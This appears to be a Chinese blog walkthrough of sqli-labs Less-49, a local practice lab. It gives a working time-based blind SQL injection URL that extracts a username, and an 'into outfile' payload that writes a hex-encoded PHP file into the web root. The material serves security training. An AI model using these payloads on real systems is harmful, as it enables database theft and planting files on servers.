Less-49

本关与47关基本类似,区别在于没有错误回显,所以我们可以通过延时注入和导入文件进行注入。

利用延时注入

http://127.0.0.1/sqli-labs/Less-49/?sort=1%27%20and%20(If(ascii(substr((select%20username%20from%20users%20where%20id=1),1,1))=69,0,sleep(5)))--+

延时效果图就不贴图展示了,可以构造substr的第一个参数进行后续注入。

或者利用into outfile进行注入

http://127.0.0.1/sqllib/Less-49/?sort=1%27into%20outfile%20%22c:\\wamp\\www\\sqllib\\test.php%22%20lines%20terminated%20by%200x3c3f70687020706870696e666f28293b3f3e2020--+

最新文章

  1. 【代码笔记】iOS-浮点数处理并去掉多余的0
  2. 浏览器本地存储(browser-storage,HTML5-localStorage > IE-UserData > Cookie)
  3. [xsd学习]xsd介绍
  4. CakeDC(cakephp company)Git workflow--适合于较大团队大型项目开发
  5. Zedboard VmodCAM PIN Constraint
  6. PHP移动互联网开发(1)——环境搭建及配置
  7. delphi公用函数
  8. Nginx http和https 共存
  9. 7、ABPZero系列教程之拼多多卖家工具 修改注册功能
  10. 谈谈java虚拟机
  11. Node js redis
  12. 华为ssh远程登录,配置
  13. shell 基本操作小结
  14. 第二章 JVM内存分配
  15. mysql explain extended 查看 执行计划
  16. CODEVS3013 单词背诵 【Hash】【MAP】
  17. HAproxy-1.6.3 安装部署
  18. 【待完善】make: command not found,以及libtool.m4 and ltmain.sh have a version mismatch问题的解决方案
  19. 【Python之路】第二十二篇--Django【基础篇】
  20. 什么是图像 -- opencv基础

热门文章

  1. Learning Scrapy笔记(五)- Scrapy登录网站
  2. openSUSE13.1安装时要注意的问题(未完待续)
  3. 刀哥多线程GCD核心概念gcd
  4. 整齐地输出n的平方,立方
  5. Visual Studio 2013中添加mimeType
  6. Android--Fragment的懒加载
  7. js贪吃蛇
  8. php读取xml文件内容,并循环写入mysql数据库
  9. openSUSE install failed
  10. R统计图